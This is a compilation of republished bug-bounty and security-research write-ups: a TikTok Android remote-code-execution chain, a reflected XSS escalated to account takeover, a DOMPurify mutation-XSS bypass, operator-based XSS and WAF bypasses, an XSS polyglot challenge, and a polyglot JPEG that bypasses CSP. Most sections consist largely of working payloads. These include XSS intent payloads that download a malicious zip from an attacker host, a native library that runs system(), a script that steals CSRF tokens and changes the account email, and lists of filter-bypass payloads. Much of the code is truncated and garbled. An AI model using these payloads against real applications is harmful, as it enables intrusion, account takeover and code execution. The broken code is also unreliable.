if((arg14.isLastTaskSuccess) && arg14.targetZipFile != null && (arg14.targetZipFile.exists())) {
arg14.bundleVersion = BaseBundleFileManager.unZipFileToBundle(arg13, arg14.targetZipFile, "download_bundle", false, v0);public static long unZipFileToBundle(Context arg8, File arg9, String arg10, boolean arg11, BaseBundleEvent arg12) {
long v10;
boolean v4;
Class v0 = BaseBundleFileManager.class;
synchronized(v0) {
boolean v1 = arg9.exists();
if(!v1) {
return 0L;
try {
File v1_1 = BaseBundleFileManager.getBundleFolderFile(arg8, arg10);
arg12.appendLog("start unzip" + arg10);
BaseBundleFileManager.tryUnzipBaseBundle(arg12, arg10, v1_1.getAbsolutePath(), arg9);private static void tryUnzipBaseBundle(BaseBundleEvent arg2, String arg3, String arg4, File arg5) {
try {
arg2.appendLog("unzip" + arg3);
IOUtils.unZipFolder(arg5.getAbsolutePath(), arg4);
}public static void unZipFolder(String arg1, String arg2) throws Exception {
IOUtils.a(new FileInputStream(arg1), arg2, false);
}private static void a(InputStream arg5, String arg6, boolean arg7) throws Exception {
ZipInputStream v0 = new ZipInputStream(arg5);
while(true) {
ZipEntry v5 = v0.getNextEntry();
if(v5 == null) {
String v1 = v5.getName();
if((arg7) && !TextUtils.isEmpty(v1) && (v1.contains("../"))) { // Are you notice arg7?
goto label_2;
if(v5.isDirectory()) {
new File(arg6 + File.separator + v1.substring(0, v1.length() - 1)).mkdirs();
goto label_2;
File v5_1 = new File(arg6 + File.separator + v1);
if(!v5_1.getParentFile().exists()) {
FileOutputStream v1_1 = new FileOutputStream(v5_1);
byte[] v5_2 = new byte[0x400];
while(true) {
int v3 = v0.read(v5_2);
if(v3 == -1) {
v1_1.write(v5_2, 0, v3);

In the last method called to unzip the file, there is a check for path traversal, but because arg7 value is false, the check won’t happen! Perfect!!

It makes us able to exploit ZIP Slip and overwrite some delicious files.

Time for RCE!

I created a zip file and path traversed the filename to overwrite /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so file:

dphoeniixx@MacBook-Pro Tiktok % 7z l libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,16 CPUs x64)

Scanning the drive for archives:
1 file, 1930 bytes (2 KiB)

Listing archive: libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip

Path = libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip
Type = zip
Physical Size = 1930

Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2020-11-26 04:08:29 ..... 5896 1496 ../../../../../../../../../data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so
------------------- ----- ------------ ------------ ------------------------
2020-11-26 04:08:29 5896 1496 1 files

Now we can overwrite native-libraries with a malicious library to execute our code. It won’t be executed unless the user relaunches the Application. I found a way to reload that library without relaunch by launching com.tt.miniapphost.placeholder.MiniappTabActivity0 Activity.

Final PoC:

document.title = "Loading..";
if (document && window.name != "finished") { // the XSS will be fired multiple time before loading the page and after. this condition to make sure that the payload won't fire multiple time.
window.name = "finished";
"__callback_id": "0",
"func": "preloadMiniApp",
"__msg_type": "callback",
"params": {
"mini_app_url": "https://microapp/"
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://d.c/"
})); // initialize Mini App
"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript:location.replace(%22intent%3A%2F%2Fwww.google.com.eg%2F%3Faction%3DsdkUpdate%26latestSDKUrl%3Dhttp%3A%2F%2F{ATTACKER_HOST}%2Flibran_a1ef01b09a3d9400b77144bbf9ad59b1.zip%26sdkUpdateVersion%3D1.87.1.11%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapp.tmatest.TmaTestActivity%3Bpackage%3Dcom.zhiliaoapp.musically%3Baction%3Dandroid.intent.action.VIEW%3Bend%22)%3B%0A&noRedirect=false&title=First%20Stage&disable_app_link=false"
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://iframe.attacker.com/"
})); // Download malicious zip file that will overwite /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so
setTimeout(function() {
"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript:location.replace(%22intent%3A%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapphost.placeholder.MiniappTabActivity0%3Bpackage%3Dcom.zhiliaoapp.musically%3BS.miniapp_url%3Dhttps%3Bend%22)%3B%0A&noRedirect=false&title=Second%20Stage&disable_app_link=false"
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://iframe.attacker.com/"
})); // load the malicious library after overwrtting it.
}, 5000);

Malicious library code:

#include <jni.h>
#include <string>
#include <stdlib.h>

JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved) {
system("id > /data/data/com.zhiliaoapp.musically/PoC");
return JNI_VERSION_1_6;

TikTok Fixing!

TikTok Security implemented an excellent and responsible fix to address those vulnerabilities in a timely manner. The following actions were taken:

  1. The vulnerable XSS code has been deleted.
  2. TmaTestActivity has been deleted.
  3. Implement restrictions to intent scheme that doesn’t allow an intent for TikTok Application on AddWikiActivity and Main WebViewActivity.

Have a nice day!

Escalating XSS to Account Takeover

Escalating XSS to Account Takeover

Original text by Aditya Verma

Hey guys, this writeup is about my first Reflected XSS and how I escalated it to account takeover.

I read many Bug Hunters implying on the fact that don’t submit a simple XSS, try to escalate it. I also would tell you to escalate as much as you can, if you give them a XSS and tell what a person can do with it, it does not shows the amount of impact as you would be able to show when you prove with how it would be done; this will increase the severity as well as your payout.

So, I was hunting on a subdomain of a private program say sub.example.com, I had been looking over this subdomain for few days and had understood almost every thing about how the things are working and what a simple person(normal account) can do.Now, I started looking for other files (which are directly not linked)in various directories of the site by directory and files fuzzing using FFUF. I found a file that looked interesting as it was a page to register (let’s name it sub.example.com/fakepath/register) and the main page that opened when someone clicked for registration was sub.example.com/fakepath/registration.

Confused Jon Stewart GIF - Find & Share on GIPHY

Now this felt like maybe this page was used earlier and then they changed things.So, as you must know that old and forgotten pages have more chances of bugs.

I ran Arjun to check for any hidden parameters and luckily found a few parameters that were being reflected back on the page.Out of those parameters 2 of them were filling in the input fields of the registration form.I send the request with first parameter and it filled the value supplied thorugh URL into the city input field.Sent the request to Burpsuite Repeater and tried basic XSS inputs.Sadly, it got html encoded ; I tried single URL encoding and double URL encoding, none worked and which made me move on to check other paratmeters.

Baby Reaction GIF - Find & Share on GIPHY

After trying almost every parameter recieved from Arjun I came back to the repeater tab of the earlier one, and just randomly gave another try with Triple URL encoding and guess what the quote(“) character passed on.

Happy You Good GIF - Find & Share on GIPHY

Made a simple payload to check sub.example.com/fakepath/register?i=aditya%252522+onmouseover=alert(1)+x=%252522sI added x parameter at last to balance the quote that is being added by system. Hovered on city input field and it popped out. I checked on other parameter that was being reflected in another input field and it was also vulnerable to similar payload.I also noticed that the registration and register page are almost similar and gave a try on registration and yes both parameters were vulnerable at that page also.

Reported the Bug as medium severity and came back. Now, got the thought that try to escalate it as other people say.I was at first reluctant but since I had already checked for CSRF on various forms like edit account and much I thought since this can execute script why not fetch the account edit page with javascript which will come with CSRF token(in this case tokens) and then send the data back with email changed.

This took some time as I am not much of a developer but short time ago I had done a project with nodeJS. With little earlier familarity and lot googling I somehow put the jigsaw pieces aligned and the script was ready(I created this script on Firefox developer tools; Just incase anyone wanna know how to do it, the console panel allows running of javascript on webpage as it would have come along with the page).Hosted the script locally and used ngrok to create a tunnel to localhost.Used the following payload sub.example.com/fakepath/register?i=aditya%252522+/%25253e%25253cscript+src%3d%252522https://my_ngrok_url/script.js%252522%25253e%25253c/script%25253e

Here is the script:

let name=[];
let value=[];
.then(function(response) {
return response.text()
}).then(function (html) {// Convert the HTML string into a document object
var parser = new DOMParser();
var doc = parser.parseFromString(html, 'text/html');
//var forms=doc.forms[0];
var element = doc.querySelectorAll('input[type="hidden"]');
//var name=[];
//var value=[];
for(var i=0; i<element.length;i++){
}).catch(function (err) {
// There was an error
console.warn('Something went wrong.', err);
function sendData( data ) {
const XHR = new XMLHttpRequest(),
FD = new FormData();
// Push our data into our FormData object
for(var i=0;i<7;i++) {
FD.append( name[i],value[i] );
// Define what happens on successful data submission
XHR.addEventListener( 'load', function( event ) {
alert( 'Yeah! Data sent and response loaded.' );
} );// Define what happens in case of error
XHR.addEventListener(' error', function( event ) {
alert( 'Oops! Something went wrong.' );
} );// Set up our request
XHR.open( 'POST', 'https://sub.example.com/fakepath/accountchange.php?update=1' );// Send our FormData object; HTTP headers are set automatically
XHR.send( FD );

If anyone wanna understand the code then you can directly contact me through Twitter, my handle is 0cirius0.

Coming back now this Reflected XSS became a high severity Account Takeover.

Mutation XSS via namespace confusion – DOMPurify < 2.0.17 bypass

Original text by MICHAŁ BENTKOWSKI

In this blogpost I’ll explain my recent bypass in DOMPurify – the popular HTML sanitizer library. In a nutshell, DOMPurify’s job is to take an untrusted HTML snippet, supposedly coming from an end-user, and remove all elements and attributes that can lead to Cross-Site Scripting (XSS).

This is the bypass:

<style></math><img src onerror=alert(1)>

Believe me that there’s not a single element in this snippet that is superfluous 🙂

To understand why this particular code worked, I need to give you a ride through some interesting features of HTML specification that I used to make the bypass work.

Usage of DOMPurify

Let’s begin with the basics, and explain how DOMPurify is usually used. Assuming that we have an untrusted HTML in htmlMarkup and we want to assign it to a certain div, we use the following code to sanitize it using DOMPurify and assign to the div:

div.innerHTML = DOMPurify.sanitize(htmlMarkup)

In terms of parsing and serializing HTML as well as operations on the DOM tree, the following operations happen in the short snippet above:

  1. htmlMarkup is parsed into the DOM Tree.
  2. DOMPurify sanitizes the DOM Tree (in a nutshell, the process is about walking through all elements and attributes in the DOM tree, and deleting all nodes that are not in the allow-list).
  3. The DOM tree is serialized back into the HTML markup.
  4. After assignment to innerHTML, the browser parses the HTML markup again.
  5. The parsed DOM tree is appended into the DOM tree of the document.

Let’s see that on a simple example. Assume that our initial markup is A<img src=1 onerror=alert(1)>B. In the first step it is parsed into the following tree:

Then, DOMPurify sanitizes it, leaving the following DOM tree:

Then it is serialized to:

A<img src=»1″>B

And this is what DOMPurify.sanitize returns. Then the markup is parsed again by the browser on assignment to innerHTML:

The DOM tree is identical to the one that DOMPurify worked on, and it is then appended to the document.

So to put it shortly, we have the following order of operations: parsing ➡️ serialization ➡️ parsing. The intuition may be that serializing a DOM tree and parsing it again should always return the initial DOM tree. But this is not true at all. There’s even a warning in the HTML spec in a section about serializing HTML fragments:

It is possible that the output of this algorithm [serializing HTML], if parsed with an HTML parser, will not return the original tree structure. Tree structures that do not roundtrip a serialize and reparse step can also be produced by the HTML parser itself, although such cases are typically non-conforming.

The important take-away is that serialize-parse roundtrip is not guaranteed to return the original DOM tree (this is also a root cause of a type of XSS known as mutation XSS). While usually these situations are a result of some kind of parser/serializer error, there are at least two cases of spec-compliant mutations.

Nesting FORM element

One of these cases is related to the FORM element. It is quite special element in the HTML because it cannot be nested in itself. The specification is explicit that it cannot have any descendant that is also a FORM:

This can be confirmed in any browser, with the following markup:

<form id=form1>INSIDE_FORM1<form id=form2>INSIDE_FORM2

Which would yield the following DOM tree:

The second form is completely omitted in the DOM tree just as it wasn’t ever there.

Now comes the interesting part. If we keep reading the HTML specification, it actually gives an example that with a slightly broken markup with mis-nested tags, it is possible to create nested forms. Here it comes (taken directly from the spec):

<form id=»outer»><div></form><form id=»inner»><input>

It yields the following DOM tree, which contains a nested form element:

This is not a bug in any particular browser; it results directly from the HTML spec, and is described in the algorithm of parsing HTML. Here’s the general idea:

  • When you open a <form> tag, the parser needs to keep record of the fact that it was opened with a form element pointer (that’s how it’s called in the spec). If the pointer is not null, then form element cannot be created.
  • When you end a <form> tag, the form element pointer is always set to null.

Thus, going back to the snippet:

<form id=»outer»><div></form><form id=»inner»><input>

In the beginning, the form element pointer is set to the one with id="outer". Then, a div is being started, and the </form> end tag set the form element pointer to null. Because it’s null, the next form with id="inner" can be created; and because we’re currently within div, we effectively have a form nested in form.

Now, if we try to serialize the resulting DOM tree, we’ll get the following markup:

<form id=»outer»><div><form id=»inner»><input></form></div></form>

Note that this markup no longer has any mis-nested tags. And when the markup is parsed again, the following DOM tree is created:

So this is a proof that serialize-reparse roundtrip is not guaranteed to return the original DOM tree. And even more interestingly, this is basically a spec-compliant mutation.

Since the very moment I was made aware of this quirk, I’ve been pretty sure that it must be possible to somehow abuse it to bypass HTML sanitizers. And after a long time of not getting any ideas of how to make use of it, I finally stumbled upon another quirk in HTML specification. But before going into the specific quirk itself, let’s talk about my favorite Pandora’s box of the HTML specification: foreign content.

Foreign content

Foreign content is a like a Swiss Army knife for breaking parsers and sanitizers. I used it in my previous DOMPurify bypass as well as in bypass of Ruby sanitize library.

The HTML parser can create a DOM tree with elements of three namespaces:

  • HTML namespace (http://www.w3.org/1999/xhtml)
  • SVG namespace (http://www.w3.org/2000/svg)
  • MathML namespace (http://www.w3.org/1998/Math/MathML)

By default, all elements are in HTML namespace; however if the parser encounters <svg> or <math> element, then it “switches” to SVG and MathML namespace respectively. And both these namespaces make foreign content.

In foreign content markup is parsed differently than in ordinary HTML. This can be most clearly shown on parsing of <style> element. In HTML namespace, <style> can only contain text; no descendants, and HTML entities are not decoded. The same is not true in foreign content: foreign content’s <style> can have child elements, and entities are decoded.

Consider the following markup:


It is parsed into the following DOM tree

Note: from now on, all elements in the DOM tree in this blogpost will contain a namespace. So html style means that it is a <style> element in HTML namespace, while svg style means that it is a <style> element in SVG namespace.

The resulting DOM tree proves my point: html style has only text content, while svg style is parsed just like an ordinary element.

Moving on, it may be tempting to make a certain observation. That is: if we are inside <svg> or <math> then all elements are also in non-HTML namespace. But this is not true. There are certain elements in HTML specification called MathML text integration points and HTML integration point. And the children of these elements have HTML namespace (with certain exceptions I’m listing below).

Consider the following example:


It is parsed into the following DOM tree:

Note how the style element that is a direct child of math is in MathML namespace, while the style element in mtext is in HTML namespace. And this is because mtext is MathML text integration points and makes the parser switch namespaces.

MathML text integration points are:

  • math mi
  • math mo
  • math mn
  • math ms

HTML integration points are:

  • math annotation-xml if it has an attribute called encoding whose value is equal to either text/html or application/xhtml+xml
  • svg foreignObject
  • svg desc
  • svg title

I always assumed that all children of MathML text integration points or HTML integration points have HTML namespace by default. How wrong was I! The HTML specification says that children of MathML text integration points are by default in HTML namespace with two exceptions: mglyph and malignmark. And this only happens if they are a direct child of MathML text integration points.

Let’s check that with the following markup:


Notice that mglyph that is a direct child of mtext is in MathML namespace, while the one that is a child of html a element is in HTML namespace.

Assume that we have a “current element”, and we’d like determine its namespace. I’ve compiled some rules of thumb:

  • Current element is in the namespace of its parent unless conditions from the points below are met.
  • If current element is <svg> or <math> and parent is in HTML namespace, then current element is in SVG or MathML namespace respectively.
  • If parent of current element is an HTML integration point, then current element is in HTML namespace unless it’s <svg> or <math>.
  • If parent of current element is an MathML integration point, then current element is in HTML namespace unless it’s <svg><math><mglyph> or <malignmark>.
  • If current element is one of <b>, <big>, <blockquote>, <body>, <br>, <center>, <code>, <dd>, <div>, <dl>, <dt>, <em>, <embed>, <h1>, <h2>, <h3>, <h4>, <h5>, <h6>, <head>, <hr>, <i>, <img>, <li>, <listing>, <menu>, <meta>, <nobr>, <ol>, <p>, <pre>, <ruby>, <s>, <small>, <span>, <strong>, <strike>, <sub>, <sup>, <table>, <tt>, <u>, <ul>, <var> or <font> with colorface or size attributes defined, then all elements on the stack are closed until a MathML text integration point, HTML integration point or element in HTML namespace is seen. Then, the current element is also in HTML namespace.

When I found this gem about mglyph in HTML spec, I immediately knew that it was what I’d been looking for in terms of abusing html form mutation to bypass sanitizer.

DOMPurify bypass

So let’s get back to the payload that bypasses DOMPurify:

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

The payload makes use of the mis-nested html form elements, and also contains mglyph element. It produces the following DOM tree:

This DOM tree is harmless. All elements are in the allow-list of DOMPurify. Note that mglyph is in HTML namespace. And the snippet that looks like XSS payload is just a text within html style. Because there’s a nested html form, we can be pretty sure that this DOM tree is going to be mutated on reparsing.

So DOMPurify has nothing to do here, and returns a serialized HTML:

1<form><math><mtext><form><mglyph><style></math><img src onerror=alert(1)></style></mglyph></form></mtext></math></form>

This snippet has nested form tags. So when it is assigned to innerHTML, it is parsed into the following DOM tree:

So now the second html form is not created and mglyph is now a direct child of mtext, meaning it is in MathML namespace. Because of that, style is also in MathML namespace, hence its content is not treated as a text. Then </math> closes the <math> element, and now img is created in HTML namespace, leading to XSS.


To summarize, this bypass was possible because of a few factors:

  • The typical usage of DOMPurify makes the HTML markup to be parsed twice.
  • HTML specification has a quirk, making it possible to create nested form elements. However, on reparsing, the second form will be gone.
  • mglyph and malignmark are special elements in the HTML spec in a way that they are in MathML namespace if they are a direct child of MathML text integration point even though all other tags are in HTML namespace by default.
  • Using all of the above, we can create a markup that has two form elements and mglyph element that is initially in HTML namespace, but on reparsing it is in MathML namespace, making the subsequent style tag to be parsed differently and leading to XSS.

After Cure53 pushed update to my bypass, another one was found:https://platform.twitter.com/embed/index.html?dnt=false&embedId=twitter-widget-1&frame=false&hideCard=false&hideThread=false&id=1307929537749999616&lang=en&origin=https%3A%2F%2Fresearch.securitum.com%2Fmutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass%2F&theme=light&widgetsVersion=ed20a2b%3A1601588405575&width=550px

I leave it as an exercise for the reader to figure it out why this payload worked. Hint: the root cause is the same as in the bug I found.

The bypass also made me realize that the pattern of

1div.innerHTML = DOMPurify.sanitize(html)

Is prone to mutation XSS-es by design and it’s just a matter of time to find another instances. I strongly suggest that you pass RETURN_DOM or RETURN_DOM_FRAGMENT options to DOMPurify, so that the serialize-parse roundtrip is not executed.

As a final note, I found the DOMPurify bypass when preparing materials for my upcoming remote training called XSS Academy. While it hasn’t been officially announced yet, details (including agenda) will be published within two weeks. I will teach about interesting XSS tricks with lots of emphasis on breaking parsers and sanitizers. If you already know that you’re interested, please contact us on training@securitum.com and we’ll have your seat booked!

XSS: Arithmetic Operators & Optional Chaining To Bypass Filters & Sanitization

Original text by Menin_TheMiddle

Using JavaScript Arithmetic Operators and Optional Chaining to bypass input validation, sanitization and HTML Entity Encoding when injection occurs in the JavaScript context. To know how to exploit an injection that could lead to an XSS vulnerability, it’s important to understand in which context the injected payload must work.

In the HTML context, the injected payload it’s different than what can be used in the JavaScript context.

Talking about JavaScript context, often developers use encoding functions as a quick and dirty way to sanitize untrusted user input (for example, converting «special» characters to HTML entities). It may appear a good injection killer to convert characters such as a single quote, double quotes, semicolon, etc… to their respective HTML entity codes, but in the JavaScript context it isn’t always a good way to prevent stored or reflected XSS. Quoting the OWASP Cross Site Scripting Prevention Cheat Sheet:

HTML entity encoding is okay for untrusted data that you put in the body of the HTML document, such as inside a <div> tag. It even sort of works for untrusted data that goes into attributes, particularly if you’re religious about using quotes around your attributes. But HTML entity encoding doesn’t work if you’re putting untrusted data inside a <script> tag anywhere, or an event handler attribute like onmouseover, or inside CSS, or in a URL. So even if you use an HTML entity encoding method everywhere, you are still most likely vulnerable to XSS. You MUST use the encode syntax for the part of the HTML document you’re putting untrusted data into. That’s what the rules below are all about.

Vulnerable Application

During a test on a customer’s web application, I found something very closed to the following code (it’s more simplified than the original):

Here the developer used the PHP htmlentities function to sanitize the user input on $_GET['user'] converting special characters to HTML entities and using ENT_QUOTES flag to convert both single and double quotes (as you can see in the table below):

The strtr function removes all semicolon characters from the string. The sanitized input is then used inside a JavaScript function to do something.

You can find something similar in an awesome Labs by PortSwigger:



If you want to run my vulnerable web application example, just copy and paste the command below and point your browser to http://localhost:9000 you should find it useful in order to test all the example payloads in this article.

curl -s 'https://gist.githubusercontent.com/theMiddleBlue/a098f37fbc08b47b2f2ddad8d1579b21/raw/103a1ccb2e46e22a35cc982a49a41b7d0/index.php' > index.php; php -S


As you can guess, in my example the user arg is vulnerable to reflected XSS in JavaScript context. Without sanitization and validation of what a user put in the user arg, it would be possible to exploit a reflected XSS with a simple injection like /?user=foo');alert('XSS. There’re two important things in this specific scenario:

  1. Due to the sanitization function, it isn’t possible to «close» the JavaScript function myFunction and start a new function using the semicolon character (by injecting something like ');alert(' the semicolon character will be removed before printing it on the response body).
  2. Due to its context, the injected payload (even encoded by htmlentities) is decoded by the user’s browser when clicking on the link. This means that the browser will decode the encoded single quote character.

Exploit using Arithmetic Operators

It is possible to exploit the XSS vulnerability in this specific JavaScript context without using any semicolon character by using JavaScript Arithmetic Operators, Bitwise Operators, Logical AND/OR Operators, etc… Consider the following example:

the first console.log function prints 1337, the difference between 1338 and 1. The second one returns NaN (Not a Number). As you can see in the screenshot, before returning NaN JavaScript executes alert(1) first and then performs the subtraction operation. We can use this condition to exploit the XSS vulnerability in our example to avoid using a semicolon.

The payload could be the following:

As you can see, the alert function went executed before the subtraction, and this means that we can execute any JavaScript function without using the sanitized semicolon character.

How many operators can be used to exploit XSS here?

Subtraction is not the only operator that you can use in this kind of exploit. Below you can find an incomplete list of operators with a working payload (when applicable) and an example that you can test in your JavaScript console by copy&paste it:

Addition (+)foo’)%2balert(‘aconsole.log(‘a’+alert(1))
Bitwise AND (&)N/Aconsole.log(‘a’&alert(1))
Bitwise OR (|)foo’)|alert(‘aconsole.log(‘a’|alert(1))
Bitwise XOR (^)foo’)^alert(‘aconsole.log(‘a’^alert(1))
Comma operator (,)foo’),alert(‘aconsole.log(‘a’,alert(1))
Conditional (ternary) operatorfoo’)%3falert(‘a’):alert(‘bconsole.log(‘a’?alert(1):»)
Division (/)foo’)/alert(‘aconsole.log(‘a’/alert(1))
Equality (==)foo’)==alert(‘aconsole.log(‘a’==alert(1))
Exponentiation (**)foo’)**alert(‘aconsole.log(‘a’**alert(1))
Greater/Less than (>/<)N/Aconsole.log(‘a’>alert(1))
Greater/Less than or equal (>=|<=)N/Aconsole.log(‘a’>=alert(1))
Inequality (!=)foo’)!=alert(‘aconsole.log(‘a’!=alert(1))
Left/Right shift (>>|<<)N/Aconsole.log(‘a'<<alert(1))
Logical AND (&&)N/Aconsole.log(‘a’&&alert(1))
Logical OR (||)foo’)||alert(‘aconsole.log(false||alert(1))
Multiplication (*)foo’)*alert(‘aconsole.log(‘a’*alert(1))
Remainder (%)foo’)%alert(‘console.log(‘a’%alert(1))
Subtraction (-)foo’)-alert(‘console.log(‘a’-alert(1))
In Operatorfoo’) in alert(‘console.log(‘a’ in alert(1))

In the specific case of our customer’s web application, characters &< and > are encoded by htmlentities so it prevents use of operators «Bitwise AND», «Greater/Less than» and «Greater/Less then or equal». All other operators can be used to leads user’s browser to execute JavaScript functions. For example:

Exploit using Optional Chaining (?.)

Some Web Application Firewall Rule Set try to prevent XSS by validating untrusted user input against a list of JavaScript functions. Something like the following Regular Expression:


As you can see, the first two syntaxes would be blocked by the WAF, but the last two don’t match the regex. Indeed a really basic technique to bypass a weak rule is to insert white spaces or comment between the function name and the first round-bracket. If you use ModSecurity of course you know that is easy to fix this kind of bypass by using the transformation functions removeWhitespace (removes all whitespace characters from input) and removeCommentsChar (removes common comments chars such as: /*, */, —, #) as the following example:

SecRule ARGS "@rx /(alert|eval|string|decodeURI|...)[(]/" \

Anyway it’s possible to bypass this specific rule by using the optional chaining operator:

The optional chaining operator (?.) permits reading the value of a property located deep within a chain of connected objects without having to expressly validate that each reference in the chain is valid. The ?. operator functions similarly to the . chaining operator, except that instead of causing an error if a reference is nullish (null or undefined), the expression short-circuits with a return value of undefined. When used with function calls, it returns undefined if the given function does not exist.

Using this operator we can bypass the ModSecurity rule shown before, and the payload becomes something like this:

If you want to try it, open your browser JavaScript console and paste the following:


Used as payload on our vulnerable web application, we can exploit the XSS bypassing both HTML entities encoding and Web Application Firewall rule:

Moreover, this operator should be used to bypass other «bad word» based WAF rules such as document.cookie with document?.cookie. Following a list of examples that you can use and you can test on your browser console:alert ?. (document ?. cookie)

self?.[‘al’+’ert’/* foo bar */]?.(‘XSS’)

true in alert /* foo */ ?. /* bar */ (/XSS/)

1 * alert ?. (/* foo */’XSS’/* bar */)

true, alert ?. (…[/XSS/])

true in self ?. [/alert/.source](/XSS/)

self ?. [/alert/ ?. source ?. toString()](/XSS/)


Never ever HTML entity encode untrusted data to sanitize user input and don’t make your own WAF rule to validate it. Use a security encoding library for your app and use the OWASP CRS as a Web Application Firewall Rule Set.


XSS Polyglot Challenge v2

( Original text by @filedescriptor )

alert() in more than one context.

What is a XSS Polyglot?

A XSS payload which runs in multiple contexts. For example, '--><svg onload=alert()> can pop alerts in <div class=''--><svg onload=alert()>'></div> and <!--'--><svg onload=alert()>-->. It is useful in testing XSS because it minimizes manual efforts and increases the success rate of blind XSS.

  • You will be given 20 common contexts in black-box
  • No DOM sinks or external libraries are involved
  • Plain HTML injection with minimum filtering
  • A headless Chrome will try your payload
  • Your payload should run alert() in 2+ contexts
  • Payloads exceeding 1024 characters will always fail
  • Network is disabled
<div class="{{payload}}"></div>
<div class='{{payload}}'></div>
<script type="text/template">{{payload}}</script>
<iframe src="{{payload}}"></iframe> " → 
<iframe srcdoc="{{payload}}"></iframe> " →  < → 
<script>"{{payload}}"</script> </script → <\/script
<script>'{{payload}}'</script> </script → <\/script
<script>`{{payload}}`</script> </script → <\/script
<script>//{{payload}}</script> </script → <\/script
<script>/*{{payload}}*/</script> </script → <\/script
<script>"{{payload}}"</script> </script → <\/script " → \"

more examples by link

Bypassing CSP using polyglot JPEGs

James challenged me to see if it was possible to create a polyglot JavaScript/JPEG. Doing so would allow me to bypass CSP on almost any website that hosts user-uploaded images on the same domain. I gleefully took up the challenge and begun dissecting the format. The first four bytes are a valid non-ASCII JavaScript variable 0xFF 0xD8 0xFF 0xE0. Then the next two bytes specify the length of the JPEG header. If we make that length of the header 0x2F2A using the bytes 0x2F 0x2A as you might guess we have a non-ASCII variable followed by a multi-line JavaScript comment. We then have to pad out the JPEG header to the length of 0x2F2A with nulls. Here’s what it looks like:

FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 00 00 00 00 00 00 00 00....

Inside a JPEG comment we can close the JavaScript comment and create an assignment for our non-ASCII JavaScript variable followed by our payload, then create another multi-line comment at the end of the JPEG comment.

FF FE 00 1C 2A 2F 3D 61 6C 65 72 74 28 22 42 75 72 70 20 72 6F 63 6B 73 2E 22 29 3B 2F 2A

0xFF 0xFE is the comment header 0x00 0x1C specifies the length of the comment then the rest is our JavaScript payload which is of course */=alert(«Burp rocks.»)/*

Next we need to close the JavaScript comment, I edited the last four bytes of the image data before the end of image marker. Here’s what the end of the file looks like:

2A 2F 2F 2F FF D9

0xFF 0xD9 is the end of image marker. Great so there is our polyglot JPEG, well not quite yet. It works great if you don’t specify a charset but on Firefox when using a UTF-8 character set for the document it corrupts our polyglot when included as an script! On MDN it doesn’t state that the script supports the charset attribute but it does. So to get the script to work you need to specify the ISO-8859-1 charset on the script tag and it executes fine.

It’s worth noting that the polyglot JPEG works on Safari, Firefox, Edge and IE11. Chrome sensibly does not execute the image as JavaScript.

Here is the polyglot JPEG:

Polyglot JPEG

The code to execute the image as JavaScript is as follows:

<script charset="ISO-8859-1" src="http://portswigger-labs.net/polyglot/jpeg/xss.jpg"></script>

File size restrictions

I attempted to upload this graphic as a phpBB profile picture but it has restrictions in place. There is a 6k file size limit and maximum dimensions of 90×90. I reduced the size of the logo by cropping and thought about how I could reduce the JPEG data. In the JPEG header I use /* which in hex is 0x2F and 0x2A, combined 0x2F2A which results in a length of 12074 which is a lot of padding and will result in a graphic far too big to fit as a profile picture. Looking at the ASCII table I tried to find a combination of characters that would be valid JavaScript and reduce the amount of padding required in the JPEG header whilst still being recognised as a valid JPEG file.

The smallest starting byte I could find was 0x9 (a tab character) followed by 0x3A (a colon) which results in a combined hex value of 0x093A (2362) that shaves a lot of bytes from our file and creates a valid non-ASCII JavaScript label statement, followed by a variable using the JFIF identifier. Then I place a forward slash 0x2F instead of the NULL character at the end of the JFIF identifier and an asterisk as the version number. Here’s what the hex looks like:

FF D8 FF E0 09 3A 4A 46 49 46 2F 2A

Now we continue the rest of the JPEG header then pad with NULLs and inject our JavaScript payload:

FF D8 FF E0 09 3A 4A 46 49 46 2F 2A 01 01 00 48 00 48 00 00 00 00 00 00 00 ... (padding more nulls) 2A 2F 3D 61 6C 65 72 74 28 22 42 75 72 70 20 72 6F 63 6B 73 2E 22 29 3B 2F 2A

Here is the smaller graphic:

Polyglot JPEG smaller


If you allow users to upload JPEGs, these uploads are on the same domain as your app, and your CSP allows script from «self», you can bypass the CSP using a polyglot JPEG by injecting a script and pointing it to that image.


In conclusion if you allow JPEG uploads on your site or indeed any type of file, it’s worth placing these assets on a separate domain. When validating a JPEG, you should rewrite the JPEG header to ensure no code is sneaked in there and remove all JPEG comments. Obviously it’s also essential that your CSP does not whitelist your image assets domain for script.

This post wouldn’t be possible without the excellent work of Ange Albertini. I used his JPEG format graphicextensively to create the polygot JPEG. Jasvir Nagra also inspired me with his blog post about polyglot GIFs.